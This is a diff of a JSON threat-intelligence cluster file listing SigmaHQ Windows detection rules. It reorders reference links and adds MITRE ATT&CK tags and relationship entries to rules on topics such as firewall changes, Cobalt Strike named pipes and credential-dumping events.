"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_access/proc_access_win_susp_seclogon.yml" ], "tags": [ @@ -4097,10 +4097,10 @@ "logsource.product": "windows", "refs": [ "https://github.com/SigmaHQ/sigma/issues/253", - "https://redcanary.com/threat-detection-report/threats/cobalt-strike/", "https://twitter.com/d4rksystem/status/1357010969264873472", - "https://labs.f-secure.com/blog/detecting-cobalt-strike-default-modules-via-named-pipe-analysis/", + "https://redcanary.com/threat-detection-report/threats/cobalt-strike/", "https://blog.cobaltstrike.com/2021/02/09/learn-pipe-fitting-for-all-of-your-offense-projects/", + "https://labs.f-secure.com/blog/detecting-cobalt-strike-default-modules-via-named-pipe-analysis/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/pipe_created/pipe_created_hktl_cobaltstrike.yml" ], "tags": [ @@ -4336,18 +4336,18 @@ "logsource.category": "pipe_created", "logsource.product": "windows", "refs": [ + "https://securelist.com/faq-the-projectsauron-apt/75533/", + "https://github.com/RiccardoAncarani/LiquidSnake", + "https://www.accenture.com/us-en/blogs/cyber-defense/turla-belugasturgeon-compromises-government-entity", + "https://www.fireeye.com/blog/threat-research/2020/12/evasive-attacker-leverages-solarwinds-supply-chain-compromises-with-sunburst-backdoor.html", + "https://thedfirreport.com/2020/06/21/snatch-ransomware/", + "https://web.archive.org/web/20180725233601/https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf", "https://www.us-cert.gov/ncas/alerts/TA17-117A", - "https://download.bitdefender.com/resources/files/News/CaseStudies/study/115/Bitdefender-Whitepaper-PAC-A4-en-EN1.pdf", + "https://securelist.com/wild-neutron-economic-espionage-threat-actor-returns-with-new-tricks/71275/", + "https://us-cert.cisa.gov/ncas/analysis-reports/ar19-304a", "https://thedfirreport.com/2022/02/21/qbot-and-zerologon-lead-to-full-domain-compromise/", "https://unit42.paloaltonetworks.com/emissary-panda-attacks-middle-east-government-sharepoint-servers/", - "https://us-cert.cisa.gov/ncas/analysis-reports/ar19-304a", - "https://thedfirreport.com/2020/06/21/snatch-ransomware/", - "https://github.com/RiccardoAncarani/LiquidSnake", - "https://web.archive.org/web/20180725233601/https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf", - "https://www.fireeye.com/blog/threat-research/2020/12/evasive-attacker-leverages-solarwinds-supply-chain-compromises-with-sunburst-backdoor.html", - "https://securelist.com/wild-neutron-economic-espionage-threat-actor-returns-with-new-tricks/71275/", - "https://securelist.com/faq-the-projectsauron-apt/75533/", - "https://www.accenture.com/us-en/blogs/cyber-defense/turla-belugasturgeon-compromises-government-entity", + "https://download.bitdefender.com/resources/files/News/CaseStudies/study/115/Bitdefender-Whitepaper-PAC-A4-en-EN1.pdf", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/pipe_created/pipe_created_mal_namedpipes.yml" ], "tags": [ @@ -4381,8 +4381,8 @@ "logsource.category": "pipe_created", "logsource.product": "windows", "refs": [ - "https://svch0st.medium.com/guide-to-named-pipes-and-hunting-for-cobalt-strike-pipes-dc46b2c5f575", "https://gist.github.com/MHaggis/6c600e524045a6d49c35291a21e10752", + "https://svch0st.medium.com/guide-to-named-pipes-and-hunting-for-cobalt-strike-pipes-dc46b2c5f575", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/pipe_created/pipe_created_hktl_cobaltstrike_susp_pipe_patterns.yml" ], "tags": [ @@ -4595,8 +4595,8 @@ "logsource.product": "windows", "refs": [ "https://github.com/Azure/Azure-Sentinel/blob/f99542b94afe0ad2f19a82cc08262e7ac8e1428e/Detections/SecurityEvent/ADFSDBNamedPipeConnection.yaml", - "https://o365blog.com/post/adfs/", "https://github.com/Azure/SimuLand", + "https://o365blog.com/post/adfs/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/pipe_created/pipe_created_susp_adfs_namedpipe_connection.yml" ], "tags": [ @@ -4662,8 +4662,8 @@ "logsource.category": "pipe_created", "logsource.product": "windows", "refs": [ - "https://svch0st.medium.com/guide-to-named-pipes-and-hunting-for-cobalt-strike-pipes-dc46b2c5f575", "https://gist.github.com/MHaggis/6c600e524045a6d49c35291a21e10752", + "https://svch0st.medium.com/guide-to-named-pipes-and-hunting-for-cobalt-strike-pipes-dc46b2c5f575", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/pipe_created/pipe_created_hktl_cobaltstrike_re.yml" ], "tags": [ @@ -4796,8 +4796,20 @@ "https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2008-r2-and-2008/dd364427(v=ws.10)", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/firewall_as/win_firewall_as_change_rule.yml" ], - "tags": "No established tags" + "tags": [ + "attack.defense_evasion", + "attack.t1562.004" + ] }, + "related": [ + { + "dest-uuid": "5372c5fe-f424-4def-bcd5-d3a8e770f07b", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "5570c4d9-8fdd-4622-965b-403a5a101aa0", "value": "Firewall Rule Modified In The Windows Firewall Exception List" }, @@ -4818,8 +4830,20 @@ "https://app.any.run/tasks/7123e948-c91e-49e0-a813-00e8d72ab393/#", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/firewall_as/win_firewall_as_add_rule_susp_folder.yml" ], - "tags": "No established tags" + "tags": [ + "attack.defense_evasion", + "attack.t1562.004" + ] }, + "related": [ + { + "dest-uuid": "5372c5fe-f424-4def-bcd5-d3a8e770f07b", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "9e2575e7-2cb9-4da1-adc8-ed94221dca5e", "value": "New Firewall Exception Rule Added For A Suspicious Folder" }, @@ -4837,8 +4861,20 @@ "https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2008-r2-and-2008/dd364427(v=ws.10)", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/firewall_as/win_firewall_as_failed_load_gpo.yml" ], - "tags": "No established tags" + "tags": [ + "attack.defense_evasion", + "attack.t1562.004" + ] }, + "related": [ + { + "dest-uuid": "5372c5fe-f424-4def-bcd5-d3a8e770f07b", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "7ec15688-fd24-4177-ba43-1a950537ee39", "value": "The Windows Defender Firewall Service Failed To Load Group Policy" }, @@ -4856,8 +4892,20 @@ "https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2008-r2-and-2008/dd364427(v=ws.10)", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/firewall_as/win_firewall_as_delete_rule.yml" ], - "tags": "No established tags" + "tags": [ + "attack.defense_evasion", + "attack.t1562.004" + ] }, + "related": [ + { + "dest-uuid": "5372c5fe-f424-4def-bcd5-d3a8e770f07b", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "c187c075-bb3e-4c62-b4fa-beae0ffc211f", "value": "A Rule Has Been Deleted From The Windows Firewall Exception List" }, @@ -4875,8 +4923,20 @@ "https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2008-r2-and-2008/dd364427(v=ws.10)", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/firewall_as/win_firewall_as_reset_config.yml" ], - "tags": "No established tags" + "tags": [ + "attack.defense_evasion", + "attack.t1562.004" + ] }, + "related": [ + { + "dest-uuid": "5372c5fe-f424-4def-bcd5-d3a8e770f07b", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "04b60639-39c0-412a-9fbe-e82499c881a3", "value": "Windows Defender Firewall Has Been Reset To Its Default Configuration" }, @@ -4894,8 +4954,20 @@ "https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2008-r2-and-2008/dd364427(v=ws.10)", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/firewall_as/win_firewall_as_delete_all_rules.yml" ], - "tags": "No established tags" + "tags": [ + "attack.defense_evasion", + "attack.t1562.004" + ] }, + "related": [ + { + "dest-uuid": "5372c5fe-f424-4def-bcd5-d3a8e770f07b", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "79609c82-a488-426e-abcf-9f341a39365d", "value": "All Rules Have Been Deleted From The Windows Firewall Configuration" }, @@ -4913,8 +4985,20 @@ "https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2008-r2-and-2008/dd364427(v=ws.10)", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/firewall_as/win_firewall_as_setting_change.yml" ], - "tags": "No established tags" + "tags": [ + "attack.defense_evasion", + "attack.t1562.004" + ] }, + "related": [ + { + "dest-uuid": "5372c5fe-f424-4def-bcd5-d3a8e770f07b", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "00bb5bd5-1379-4fcf-a965-a5b6f7478064", "value": "Windows Firewall Settings Have Been Changed" }, @@ -4932,8 +5016,20 @@ "https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2008-r2-and-2008/dd364427(v=ws.10)", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/firewall_as/win_firewall_as_add_rule.yml" ], - "tags": "No established tags" + "tags": [ + "attack.defense_evasion", + "attack.t1562.004" + ] }, + "related": [ + { + "dest-uuid": "5372c5fe-f424-4def-bcd5-d3a8e770f07b", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "cde0a575-7d3d-4a49-9817-b8004a7bf105", "value": "New Firewall Rule Added In Windows Firewall Exception List" }, @@ -5095,8 +5191,8 @@ "logsource.category": "No established category", "logsource.product": "windows", "refs": [ - "https://twitter.com/deviouspolack/status/832535435960209408", "https://www.hybrid-analysis.com/sample/027cc450ef5f8c5f653329641ec1fed91f694e0d229928963b30f6b0d7d3a745?environmentId=100", + "https://twitter.com/deviouspolack/status/832535435960209408", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_susp_eventlog_cleared.yml" ], "tags": [ @@ -5130,10 +5226,10 @@ "logsource.category": "No established category", "logsource.product": "windows", "refs": [ + "https://www.trendmicro.com/vinfo/hk-en/security/news/cybercrime-and-digital-threats/malicious-spam-campaign-uses-iso-image-files-to-deliver-lokibot-and-nanocore", "https://twitter.com/MsftSecIntel/status/1257324139515269121", "https://www.proofpoint.com/us/blog/threat-insight/threat-actor-profile-ta2719-uses-colorful-lures-deliver-rats-local-languages", "https://github.com/redcanaryco/atomic-red-team/blob/0f229c0e42bfe7ca736a14023836d65baa941ed2/atomics/T1553.005/T1553.005.md#atomic-test-1---mount-iso-image", - "https://www.trendmicro.com/vinfo/hk-en/security/news/cybercrime-and-digital-threats/malicious-spam-campaign-uses-iso-image-files-to-deliver-lokibot-and-nanocore", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_iso_mount.yml" ], "tags": [ @@ -5166,8 +5262,8 @@ "logsource.category": "No established category", "logsource.product": "windows", "refs": [ - "https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4701", "https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4699", + "https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4701", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_susp_scheduled_task_delete_or_disable.yml" ], "tags": [ @@ -5285,8 +5381,8 @@ "logsource.category": "No established category", "logsource.product": "windows", "refs": [ - "https://web.archive.org/web/20230208123920/https://cyberwardog.blogspot.com/2017/03/chronicles-of-threat-hunter-hunting-for_22.html", "https://www.slideshare.net/heirhabarov/hunting-for-credentials-dumping-in-windows-environment", + "https://web.archive.org/web/20230208123920/https://cyberwardog.blogspot.com/2017/03/chronicles-of-threat-hunter-hunting-for_22.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_susp_lsass_dump_generic.yml" ], "tags": [ @@ -5352,12 +5448,24 @@ "logsource.category": "No established category", "logsource.product": "windows", "refs": [ - "https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-6423", "https://github.com/Yamato-Security/EnableWindowsLogSettings/blob/7f6d755d45ac7cc9fc35b0cbf498e6aa4ef19def/ConfiguringSecurityLogAuditPolicies.md", + "https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-6423", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_device_installation_blocked.yml" ], - "tags": "No established tags" + "tags": [ + "attack.initial_access", + "attack.t1200" + ] }, + "related": [ + { + "dest-uuid": "d40239b3-05ff-46d8-9bdd-b46d13463ef9", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "c9eb55c3-b468-40ab-9089-db2862e42137", "value": "Device Installation Blocked" }, @@ -5407,13 +5515,43 @@ "logsource.category": "No established category", "logsource.product": "windows", "refs": [ + "https://github.com/Yamato-Security/EnableWindowsLogSettings/blob/7f6d755d45ac7cc9fc35b0cbf498e6aa4ef19def/ConfiguringSecurityLogAuditPolicies.md", "https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4964", "https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4672", - "https://github.com/Yamato-Security/EnableWindowsLogSettings/blob/7f6d755d45ac7cc9fc35b0cbf498e6aa4ef19def/ConfiguringSecurityLogAuditPolicies.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_admin_logon.yml" ], - "tags": "No established tags" + "tags": [ + "attack.defense_evasion", + "attack.lateral_movement", + "attack.credential_access", + "attack.t1558", + "attack.t1649", + "attack.t1550" + ] }, + "related": [ + { + "dest-uuid": "3fc01293-ef5e-41c6-86ce-61f10706b64a", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "7de1f7ac-5d0c-4c9c-8873-627202205331", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "51a14c76-dd3b-440b-9c20-2bf91d25a814", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "94309181-d345-4cbf-b5fe-061769bdf9cb", "value": "User with Privileges Logon" }, @@ -5430,8 +5568,8 @@ "logsource.category": "No established category", "logsource.product": "windows", "refs": [ - "https://o365blog.com/post/hybridhealthagent/", "https://github.com/OTRF/Set-AuditRule/blob/c3dec5443414231714d850565d364ca73475ade5/rules/registry/aad_connect_health_monitoring_agent.yml", + "https://o365blog.com/post/hybridhealthagent/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_aadhealth_mon_agent_regkey_access.yml" ], "tags": [ @@ -5464,8 +5602,8 @@ "logsource.category": "No established category", "logsource.product": "windows", "refs": [ - "https://twitter.com/mattifestation/status/899646620148539397", "https://www.eideon.com/2018-03-02-THL03-WMIBackdoors/", + "https://twitter.com/mattifestation/status/899646620148539397", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_wmi_persistence.yml" ], "tags": [ @@ -5502,8 +5640,20 @@ "https://twitter.com/sbousseaden/status/1523383197513379841", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_susp_opened_encrypted_zip.yml" ], - "tags": "No established tags" + "tags": [ + "attack.defense_evasion", + "attack.t1027" + ] }, + "related": [ + { + "dest-uuid": "b3d682b6-98f2-4fb0-aa3b-b4df007ca70a", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "00ba9da1-b510-4f6b-b258-8d338836180f", "value": "Password Protected ZIP File Opened" }, @@ -5588,10 +5738,10 @@ "logsource.category": "No established category", "logsource.product": "windows", "refs": [ + "https://github.com/sensepost/ruler/issues/47", + "https://github.com/sensepost/ruler", "https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4776", "https://github.com/staaldraad/go-ntlm/blob/cd032d41aa8ce5751c07cb7945400c0f5c81e2eb/ntlm/ntlmv1.go#L427", - "https://github.com/sensepost/ruler", - "https://github.com/sensepost/ruler/issues/47", "https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4624", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_alert_ruler.yml" ], @@ -5682,9 +5832,9 @@ "logsource.category": "No established category", "logsource.product": "windows", "refs": [ - "https://blog.f-secure.com/wp-content/uploads/2019/10/CosmicDuke.pdf", - "https://www.fireeye.com/blog/threat-research/2017/05/wannacry-malware-profile.html", "https://awakesecurity.com/blog/threat-hunting-for-paexec/", + "https://www.fireeye.com/blog/threat-research/2017/05/wannacry-malware-profile.html", + "https://blog.f-secure.com/wp-content/uploads/2019/10/CosmicDuke.pdf", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_mal_service_installs.yml" ], "tags": [ @@ -5877,9 +6027,9 @@ "logsource.category": "No established category", "logsource.product": "windows", "refs": [ + "https://github.com/Yamato-Security/EnableWindowsLogSettings/blob/7f6d755d45ac7cc9fc35b0cbf498e6aa4ef19def/ConfiguringSecurityLogAuditPolicies.md", "https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4647", "https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4634", - "https://github.com/Yamato-Security/EnableWindowsLogSettings/blob/7f6d755d45ac7cc9fc35b0cbf498e6aa4ef19def/ConfiguringSecurityLogAuditPolicies.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_user_logoff.yml" ], "tags": "No established tags" @@ -5932,8 +6082,8 @@ "logsource.category": "No established category", "logsource.product": "windows", "refs": [ - "https://docs.microsoft.com/en-gb/sysinternals/downloads/sdelete", "https://jpcertcc.github.io/ToolAnalysisResultSheet/details/sdelete.htm", + "https://docs.microsoft.com/en-gb/sysinternals/downloads/sdelete", "https://www.jpcert.or.jp/english/pub/sr/ir_research.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_susp_sdelete.yml" ], @@ -6180,8 +6330,8 @@ "logsource.category": "No established category", "logsource.product": "windows", "refs": [ - "https://threathunterplaybook.com/library/windows/active_directory_replication.html", "https://threathunterplaybook.com/hunts/windows/190101-ADModDirectoryReplication/notebook.html", + "https://threathunterplaybook.com/library/windows/active_directory_replication.html", "https://threathunterplaybook.com/hunts/windows/180815-ADObjectAccessReplication/notebook.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_ad_object_writedac_access.yml" ], @@ -6539,8 +6689,8 @@ "logsource.product": "windows", "refs": [ "https://gist.github.com/gentilkiwi/dcc132457408cf11ad2061340dcb53c2", - "https://twitter.com/gentilkiwi/status/1003236624925413376", "https://blog.alsid.eu/dcshadow-explained-4510f52fc19d", + "https://twitter.com/gentilkiwi/status/1003236624925413376", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_possible_dc_shadow.yml" ], "tags": [ @@ -6684,9 +6834,9 @@ "logsource.category": "No established category", "logsource.product": "windows", "refs": [ + "Live environment caused by malware", "https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4616", "Private Cuckoo Sandbox (from many years ago, no longer have hash, NDA as well)", - "Live environment caused by malware", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_susp_time_modification.yml" ], "tags": [ @@ -7230,12 +7380,24 @@ "logsource.category": "No established category", "logsource.product": "windows", "refs": [ - "https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4649", "https://github.com/Yamato-Security/EnableWindowsLogSettings/blob/7f6d755d45ac7cc9fc35b0cbf498e6aa4ef19def/ConfiguringSecurityLogAuditPolicies.md", + "https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4649", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_replay_attack_detected.yml" ], - "tags": "No established tags" + "tags": [ + "attack.credential_access", + "attack.t1558" + ] }, + "related": [ + { + "dest-uuid": "3fc01293-ef5e-41c6-86ce-61f10706b64a", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "5a44727c-3b85-4713-8c44-4401d5499629", "value": "Replay Attack Detected" }, @@ -7252,10 +7414,10 @@ "logsource.category": "No established category", "logsource.product": "windows", "refs": [ - "https://twitter.com/SecurityJosh/status/1283027365770276866", - "https://twitter.com/Flangvik/status/1283054508084473861", - "https://gist.github.com/Cyb3rWard0g/cf08c38c61f7e46e8404b38201ca01c8", "https://securityjosh.github.io/2020/04/23/Mute-Sysmon.html", + "https://gist.github.com/Cyb3rWard0g/cf08c38c61f7e46e8404b38201ca01c8", + "https://twitter.com/Flangvik/status/1283054508084473861", + "https://twitter.com/SecurityJosh/status/1283027365770276866", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_sysmon_channel_reference_deletion.yml" ], "tags": [ @@ -7568,9 +7730,9 @@ "logsource.category": "No established category", "logsource.product": "windows", "refs": [ + "https://isc.sans.edu/forums/diary/Active+Directory+Certificate+Services+ADCS+PKI+domain+admin+vulnerability/27668/", "https://github.com/topotam/PetitPotam", "https://github.com/splunk/security_content/blob/develop/detections/endpoint/petitpotam_suspicious_kerberos_tgt_request.yml", - "https://isc.sans.edu/forums/diary/Active+Directory+Certificate+Services+ADCS+PKI+domain+admin+vulnerability/27668/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_petitpotam_susp_tgt_request.yml" ], "tags": [ @@ -7603,8 +7765,8 @@ "logsource.category": "No established category", "logsource.product": "windows", "refs": [ - "https://blog.dylan.codes/evading-sysmon-and-windows-event-logging/", "https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4673", + "https://blog.dylan.codes/evading-sysmon-and-windows-event-logging/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_user_driver_loaded.yml" ], "tags": [ @@ -7679,8 +7841,8 @@ "logsource.category": "No established category", "logsource.product": "windows", "refs": [ - "https://blog.cobaltstrike.com/2014/04/02/what-happens-when-i-type-getsystem/", "https://speakerdeck.com/heirhabarov/hunting-for-privilege-escalation-in-windows-environment", + "https://blog.cobaltstrike.com/2014/04/02/what-happens-when-i-type-getsystem/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_meterpreter_or_cobaltstrike_getsystem_service_install.yml" ], "tags": [ @@ -7722,8 +7884,8 @@ "logsource.category": "No established category", "logsource.product": "windows", "refs": [ - "https://adsecurity.org/?p=3458", "https://www.trimarcsecurity.com/single-post/TrimarcResearch/Detecting-Kerberoasting-Activity", + "https://adsecurity.org/?p=3458", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_susp_rc4_kerberos.yml" ], "tags": [ @@ -7863,13 +8025,25 @@ "logsource.category": "No established category", "logsource.product": "windows", "refs": [ - "https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4743", "https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4741", "https://github.com/Yamato-Security/EnableWindowsLogSettings/blob/7f6d755d45ac7cc9fc35b0cbf498e6aa4ef19def/ConfiguringSecurityLogAuditPolicies.md", + "https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4743", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_add_remove_computer.yml" ], - "tags": "No established tags" + "tags": [ + "attack.defense_evasion", + "attack.t1207" + ] }, + "related": [ + { + "dest-uuid": "564998d8-ab3e-4123-93fb-eccaa6b9714a", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "20d96d95-5a20-4cf1-a483-f3bda8a7c037", "value": "Add or Remove Computer from DC" }, @@ -8167,8 +8341,8 @@ "logsource.category": "No established category", "logsource.product": "windows", "refs": [ - "https://threathunterplaybook.com/library/windows/active_directory_replication.html", "https://threathunterplaybook.com/hunts/windows/190101-ADModDirectoryReplication/notebook.html", + "https://threathunterplaybook.com/library/windows/active_directory_replication.html", "https://threathunterplaybook.com/hunts/windows/180815-ADObjectAccessReplication/notebook.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_ad_replication_non_machine_account.yml" ], @@ -8205,8 +8379,29 @@ "https://twitter.com/sbousseaden/status/1523383197513379841", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_susp_opened_encrypted_zip_outlook.yml" ], - "tags": "No established tags" + "tags": [ + "attack.defense_evasion", + "attack.initial_access", + "attack.t1027", + "attack.t1566.001" + ] }, + "related": [ + { + "dest-uuid": "b3d682b6-98f2-4fb0-aa3b-b4df007ca70a", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "2e34237d-8574-43f6-aace-ae2915de8597", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "571498c8-908e-40b4-910b-d2369159a3da", "value": "Password Protected ZIP File Opened (Email Attachment)" }, @@ -8223,10 +8418,10 @@ "logsource.category": "No established category", "logsource.product": "windows", "refs": [ - "https://nvlpubs.nist.gov/nistpubs/CSWP/NIST.CSWP.04162018.pdf", - "https://www.pcisecuritystandards.org/documents/PCI_DSS_v3-2-1.pdf", "https://www.ultimatewindowssecurity.com/securitylog/encyclopedia/event.aspx?eventID=4800", + "https://www.pcisecuritystandards.org/documents/PCI_DSS_v3-2-1.pdf", "https://www.cisecurity.org/controls/cis-controls-list/", + "https://nvlpubs.nist.gov/nistpubs/CSWP/NIST.CSWP.04162018.pdf", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_workstation_was_locked.yml" ], "tags": "No established tags" @@ -8247,16 +8442,16 @@ "logsource.category": "No established category", "logsource.product": "windows", "refs": [ - "https://github.com/dotnet/runtime/blob/4f9ae42d861fcb4be2fcd5d3d55d5f227d30e723/docs/coding-guidelines/clr-jit-coding-conventions.md#1412-disabling-code", - "https://i.blackhat.com/EU-21/Wednesday/EU-21-Teodorescu-Veni-No-Vidi-No-Vici-Attacks-On-ETW-Blind-EDRs.pdf", - "https://social.msdn.microsoft.com/Forums/vstudio/en-US/0878832e-39d7-4eaf-8e16-a729c4c40975/what-can-i-use-e13c0d23ccbc4e12931bd9cc2eee27e4-for?forum=clr", - "https://github.com/dotnet/runtime/blob/7abe42dc1123722ed385218268bb9fe04556e3d3/src/coreclr/src/inc/clrconfig.h#L33-L39", - "https://github.com/dotnet/runtime/blob/f62e93416a1799aecc6b0947adad55a0d9870732/src/coreclr/src/inc/clrconfigvalues.h#L35-L38", - "https://bunnyinside.com/?term=f71e8cb9c76a", "http://managed670.rssing.com/chan-5590147/all_p1.html", + "https://github.com/dotnet/runtime/blob/f62e93416a1799aecc6b0947adad55a0d9870732/src/coreclr/src/inc/clrconfigvalues.h#L35-L38", + "https://github.com/dotnet/runtime/blob/7abe42dc1123722ed385218268bb9fe04556e3d3/src/coreclr/src/inc/clrconfig.h#L33-L39", + "https://github.com/dotnet/runtime/blob/4f9ae42d861fcb4be2fcd5d3d55d5f227d30e723/docs/coding-guidelines/clr-jit-coding-conventions.md#1412-disabling-code", "https://twitter.com/_xpn_/status/1268712093928378368", - "https://github.com/dotnet/runtime/search?p=1&q=COMPlus_&unscoped_q=COMPlus_", "https://github.com/dotnet/runtime/blob/ee2355c801d892f2894b0f7b14a20e6cc50e0e54/docs/design/coreclr/jit/viewing-jit-dumps.md#setting-configuration-variables", + "https://bunnyinside.com/?term=f71e8cb9c76a", + "https://social.msdn.microsoft.com/Forums/vstudio/en-US/0878832e-39d7-4eaf-8e16-a729c4c40975/what-can-i-use-e13c0d23ccbc4e12931bd9cc2eee27e4-for?forum=clr", + "https://i.blackhat.com/EU-21/Wednesday/EU-21-Teodorescu-Veni-No-Vidi-No-Vici-Attacks-On-ETW-Blind-EDRs.pdf", + "https://github.com/dotnet/runtime/search?p=1&q=COMPlus_&unscoped_q=COMPlus_", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_dot_net_etw_tamper.yml" ], "tags": [ @@ -8460,8 +8655,8 @@ "logsource.category": "No established category", "logsource.product": "windows", "refs": [ - "https://o365blog.com/post/hybridhealthagent/", "https://github.com/OTRF/Set-AuditRule/blob/c3dec5443414231714d850565d364ca73475ade5/rules/registry/aad_connect_health_service_agent.yml", + "https://o365blog.com/post/hybridhealthagent/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_aadhealth_svc_agent_regkey_access.yml" ], "tags": [ @@ -8561,8 +8756,8 @@ "logsource.category": "No established category", "logsource.product": "windows", "refs": [ - "https://blog.harmj0y.net/redteaming/another-word-on-delegation/", "https://adsecurity.org/?p=2053", + "https://blog.harmj0y.net/redteaming/another-word-on-delegation/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_alert_enable_weak_encryption.yml" ], "tags": [ @@ -8672,8 +8867,37 @@ "https://twitter.com/sbousseaden/status/1523383197513379841", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_susp_opened_encrypted_zip_filename.yml" ], - "tags": "No established tags" + "tags": [ + "attack.command_and_control", + "attack.defense_evasion", + "attack.t1027", + "attack.t1105", + "attack.t1036" + ] }, + "related": [ + { + "dest-uuid": "b3d682b6-98f2-4fb0-aa3b-b4df007ca70a", + 